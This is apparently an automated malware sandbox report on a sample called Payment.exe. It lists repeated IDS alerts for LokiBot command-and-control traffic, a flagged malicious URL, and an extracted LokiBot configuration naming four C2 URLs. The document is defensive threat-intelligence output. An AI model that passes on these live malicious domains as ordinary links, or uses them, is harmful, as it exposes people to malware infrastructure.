2025-02-27T23:41:21.867828+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49733	TCP
2025-02-27T23:41:23.793142+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49734	TCP
2025-02-27T23:41:31.692965+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49738	TCP
2025-02-27T23:41:39.466581+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49748	TCP
2025-02-27T23:41:43.306503+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49750	TCP
2025-02-27T23:41:45.251242+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49751	TCP
2025-02-27T23:41:47.212380+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49752	TCP
2025-02-27T23:41:49.144737+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49753	TCP
2025-02-27T23:41:51.157553+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49754	TCP
2025-02-27T23:41:55.103400+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49756	TCP
2025-02-27T23:41:58.951334+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49758	TCP
2025-02-27T23:42:02.885704+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49760	TCP
2025-02-27T23:42:06.756267+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49762	TCP
2025-02-27T23:42:10.557978+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49775	TCP
2025-02-27T23:42:16.529854+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49817	TCP
2025-02-27T23:42:20.249594+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49837	TCP
2025-02-27T23:42:22.087244+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49852	TCP
2025-02-27T23:42:24.056977+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49863	TCP
2025-02-27T23:42:27.888228+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49890	TCP
2025-02-27T23:42:31.861196+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49917	TCP
2025-02-27T23:42:38.103966+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49952	TCP
2025-02-27T23:42:40.049126+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49967	TCP
2025-02-27T23:42:41.861447+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49982	TCP
2025-02-27T23:42:43.772310+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49993	TCP
2025-02-27T23:42:47.559067+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50020	TCP
2025-02-27T23:42:51.447775+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50044	TCP
2025-02-27T23:42:53.395831+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50052	TCP
2025-02-27T23:42:59.194583+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50055	TCP
2025-02-27T23:43:01.249223+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50056	TCP
2025-02-27T23:43:05.102064+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50058	TCP
2025-02-27T23:43:10.862859+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50061	TCP
2025-02-27T23:43:12.805567+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50062	TCP
2025-02-27T23:43:18.629041+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50065	TCP
2025-02-27T23:43:20.631802+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50066	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T23:41:21.862696+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:23.788024+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:25.922693+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:27.811495+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:29.728704+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:31.687456+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:33.644680+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:35.539251+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:37.419291+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:39.461506+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:41.340916+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:43.301447+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:45.246034+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:47.207297+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:49.139467+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:51.106126+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:53.134282+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:55.098268+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:57.023183+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:58.942971+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:42:00.874262+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:02.880076+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:04.796105+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:06.748960+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:08.632728+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:10.551673+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:12.434085+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:14.369807+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:16.524708+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:18.423721+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:20.234461+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:22.082049+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:24.051804+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:25.933559+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:27.883156+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:29.944933+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:31.852105+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:34.219878+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:36.120652+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:38.098940+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:40.042729+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:41.856341+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:43.767205+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:45.743357+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:47.553709+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:49.501980+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:51.442688+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:53.390655+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:55.315764+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:57.248846+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:59.189363+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:43:01.244051+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:03.138293+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:05.096644+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:07.012698+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:08.907910+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:10.857749+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:12.800249+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:14.728916+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:16.642122+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:18.623939+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:20.626742+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50066	104.21.64.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T23:41:18.348276+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:20.264637+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:21.084508+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:23.021054+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:25.175849+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:27.083384+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:28.974469+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:30.900861+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:32.867990+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:34.795860+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:36.673081+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:38.584676+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:40.628415+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:42.497605+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:44.459058+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:46.424571+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:48.380355+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:50.303138+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:52.384767+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:54.315138+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:56.282080+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:58.153604+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:42:00.113162+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:02.089165+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:04.029219+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:05.961795+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:07.905333+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:09.784039+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:11.709602+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:13.644260+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:15.759724+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:17.703200+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:19.576890+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:21.436220+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:23.237914+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:25.207910+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:27.093105+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:29.032802+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:31.093903+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:32.997651+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:35.360167+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:37.289891+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:39.269760+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:41.224736+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:43.021533+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:44.950481+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:46.933140+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:48.714574+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:50.665974+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:52.600949+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:54.555374+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:56.506891+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:58.409663+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:43:00.602248+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:02.418608+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:04.447901+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:06.273683+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:08.180377+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:10.083396+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:12.023349+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:13.982660+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:15.922273+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:17.811982+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:19.826738+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50066	104.21.64.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T23:41:18.348276+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:20.264637+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:21.084508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:23.021054+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:25.175849+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:27.083384+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:28.974469+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:30.900861+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:32.867990+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:34.795860+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:36.673081+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:38.584676+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:40.628415+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:42.497605+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:44.459058+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:46.424571+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:48.380355+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:50.303138+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:52.384767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:54.315138+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:56.282080+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:58.153604+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:42:00.113162+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:02.089165+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:04.029219+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:05.961795+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:07.905333+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:09.784039+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:11.709602+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:13.644260+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:15.759724+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:17.703200+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:19.576890+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:21.436220+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:23.237914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:25.207910+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:27.093105+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:29.032802+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:31.093903+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:32.997651+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:35.360167+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:37.289891+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:39.269760+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:41.224736+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:43.021533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:44.950481+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:46.933140+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:48.714574+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:50.665974+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:52.600949+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:54.555374+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:56.506891+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:58.409663+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:43:00.602248+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:02.418608+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:04.447901+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:06.273683+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:08.180377+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:10.083396+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:12.023349+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:13.982660+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:15.922273+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:17.811982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:19.826738+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50066	104.21.64.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/sccc/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.svchost.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: Payment.exe	Virustotal: Detection: 55%			Perma Link
Source: Payment.exe	ReversingLabs: Detection: 31%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Payment.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: Payment.exe, 00000000.00000003.1749712815.0000000004120000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.1749004830.0000000004210000.00000004.00001000.00020000.00000000.sdmp
